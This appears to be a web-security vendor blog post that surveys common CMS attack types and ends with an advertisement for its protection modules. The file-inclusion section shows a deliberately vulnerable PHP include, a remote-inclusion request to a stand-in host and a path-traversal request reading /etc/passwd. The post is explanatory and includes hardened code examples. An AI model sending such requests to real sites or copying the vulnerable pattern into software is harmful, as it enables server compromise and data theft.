The most common CMS attack types
Daniel Mecsei

Nowadays, the Internet plays a huge part in our lives. It grows every day and now holds more than one billion websites. Most of these sites are built with a CMS (Content Management System), a tool that lets users without any programming skills create websites.

The most common CMSs are written in PHP, because PHP is what most shared-hosting providers offer for running your website. According to the statistics, WordPress has the largest market share with 52%, followed by Joomla with only 6%.

The biggest problem with open-source CMSs is security. You only get support from the community, and you hear all the time from the open-source crowd that “more eyes, fewer vulnerabilities, greater security”. But there is a flip side: because the code is open, anyone can study the system and discover vulnerabilities that can be exploited.
Anybody can create a plugin or template with its own bugs, and it becomes outdated if the developer stops maintaining it, but these are unusual targets for hackers. They search for security holes in the core modules, extensions and configuration settings.

The main reasons for finding these holes are:

  • Data manipulation
  • Accessing data
  • Phishing
  • Code execution

The most commonly used attacks are:

  • SQL Injection
  • File inclusion vulnerability
  • Cross-Site Scripting
  • Comment Spamming
  • Remote Command Execution
  • File Upload

Let’s check out these attack types.

SQL Injection

SQL injection is a data-driven code injection technique that allows attackers to spoof identities, manipulate data (create/change/destroy), or escalate privileges. SQL injection is one of the top 10 web application vulnerabilities.

You can find more information about this attack type in our previous blog post.

File Inclusion Vulnerability

This attack type mostly affects web applications that rely on a scripting runtime. It happens when the application builds the path of a file to execute from an attacker-controlled variable, which lets the attacker choose which file is executed at runtime. This attack has two types:

  • Remote File Inclusion (RFI)
  • Local File Inclusion (LFI)

RFI occurs when the web application downloads and runs a remote file. LFI, on the other hand, includes local files that contain attacker-controlled data (such as access logs or previously uploaded files).

A minimal example for this:


<?php
// Vulnerable: the theme name comes straight from the query string
// and is used unchanged to build the path of the file that gets included.
if ( isset( $_GET['theme'] ) ) {
    include( $_GET['theme'] . '.php' );
}
?>


For the client side:


A common request looks like:

/gettheme.php?theme=classic

But if we switch it to a URL or to a well-known Unix/Linux file, we can obtain information about the system that runs the web page, or even execute remote code:

/gettheme.php?theme=http://verydangerous.com/danger.txt
/gettheme.php?theme=../../../../etc/passwd
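A hardened version of the theme loader above, added here as an example (it is not the original post's code). It assumes the themes live in a themes/ directory next to the script and that the allowed theme names are known in advance; the names in ALLOWED_THEMES are made up for the example.

```php
<?php
declare(strict_types=1);

// Assumption: themes are stored as ./themes/<name>.php next to this script.
const THEME_DIR = __DIR__ . '/themes';
// Explicit allowlist of theme names (constructed for this example).
const ALLOWED_THEMES = ['classic', 'modern', 'dark'];

/**
 * Resolve a user-supplied theme name to an absolute file path, or return null
 * when the request must be ignored. The caller falls back to the default theme.
 */
function resolve_theme($requested): ?string
{
    // Arrays (theme[]=x) and missing values are rejected up front.
    if (!is_string($requested)) {
        return null;
    }
    // 1. Only a plain identifier is acceptable. This stops "../../etc/passwd",
    //    "http://..." and similar inputs before they reach the filesystem.
    if (preg_match('/\A[a-z0-9_-]{1,32}\z/', $requested) !== 1) {
        return null;
    }
    // 2. Compare against the allowlist instead of trusting whatever exists on disk.
    if (!in_array($requested, ALLOWED_THEMES, true)) {
        return null;
    }
    // 3. Belt and braces: canonicalise and confirm the file is inside THEME_DIR.
    $path = realpath(THEME_DIR . '/' . $requested . '.php');
    $base = realpath(THEME_DIR);
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$theme = resolve_theme($_GET['theme'] ?? null) ?? resolve_theme('classic');
if ($theme === null) {
    http_response_code(500);
    exit('Default theme is missing');
}
include $theme;
```

Independently of the code, keeping allow_url_include=Off in php.ini (the default) means include cannot fetch remote URLs at all, so RFI is blocked at the interpreter level even if a check is missed.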

Cross-Site Scripting

Cross-Site Scripting (XSS) allows attackers to inject client-side scripts into web pages in order to obtain user credentials, deface websites, or insert malicious content. It has many types, such as reflected (aka non-persistent), persistent, Self-XSS or Mutated XSS (mXSS). Fortunately, BitNinja can protect you from these attack types. For further information, please check out our blog post.

Comment Spamming

Comment spamming is an uncommon attack type because of Captcha, reCaptcha (v1/v2), and other types of challenge-response tests.
The attacker posts random comments automatically in order to make their own site more visible to search engines, show links to malicious websites, display unwanted advertisements, etc. Websites with a comment posting option are targeted by this type of attack.

Remote Command Execution

This vulnerability allows the attacker to execute operating system commands in a system shell with the same privileges as the vulnerable application. It is commonly chained with another vulnerability that is used to upload the attacker's own custom web application in order to make the job easier.
We mostly catch requests to WSO, which is a PHP WebShell application.

With this web application tool, you get a lot of information about the server where the script is running, and you also get a File Manager, a Brute Force Tool for SQL, and a simple console for executing system commands on the server.

File Upload

It is a rare and not very efficient type of attack. It is mostly used as a DOS (Denial of Service) attack: if the attacker uploads harmful files or overwrites critical files, your server becomes unstable, or the harmful files open the door to another type of attack. If no quota limits are enabled on the server, the attacker can fill up its disk space by uploading large files, or by uploading a lot of small files, which leads to inode exhaustion.
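An upload handler that addresses the failure modes described above (oversized files, overwriting existing files, unbounded file counts, and uploaded files that could later be included or executed), added here as an example rather than taken from the post. It assumes the form field is named "upload", that UPLOAD_DIR is outside the web root and writable by PHP, and that a user id is available in the session; the limits are chosen for the example.

```php
<?php
declare(strict_types=1);

const UPLOAD_DIR     = '/var/app/uploads';   // assumption: not served by the web server
const MAX_BYTES      = 2 * 1024 * 1024;       // per-file size cap (example value)
const MAX_FILES_USER = 100;                   // simple per-user quota against inode exhaustion
// Type is decided from file content and mapped to a server-chosen extension.
const ALLOWED_TYPES  = ['image/png' => 'png', 'image/jpeg' => 'jpg'];

function store_upload(array $file, string $userId): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('No valid upload');
    }
    // Enforce the size server-side; MAX_FILE_SIZE in the form is only a hint.
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }
    // Inspect the content; the client-supplied name and MIME type are not trusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('Type not allowed');
    }
    // One directory per user keeps the quota check a simple count.
    $dir = UPLOAD_DIR . '/' . preg_replace('/[^a-z0-9]/i', '', $userId);
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        throw new RuntimeException('Cannot create user directory');
    }
    if (count(glob($dir . '/*') ?: []) >= MAX_FILES_USER) {
        throw new RuntimeException('Upload quota reached');
    }
    // The server generates the name, so the client can neither overwrite an
    // existing file nor smuggle in an executable extension such as .php.
    $dest = $dir . '/' . bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    return $dest;
}

try {
    $stored = store_upload($_FILES['upload'] ?? [], $_SESSION['user_id'] ?? 'anonymous');
    echo 'Stored as ' . basename($stored);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo $e->getMessage();
}
```

Because the files never land inside the document root and never get a script extension, the "previously uploaded files" path from the LFI section above is closed off at the same time.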

As you can see, hackers have a wide selection of attack types, and with them they can DOS your site or even get their hands on the sensitive information in your possession. Luckily, BitNinja can protect you with these modules:

  • DOS Protection
  • IP Reputation
  • Malware Detection
  • Web Application Firewall (WAF)

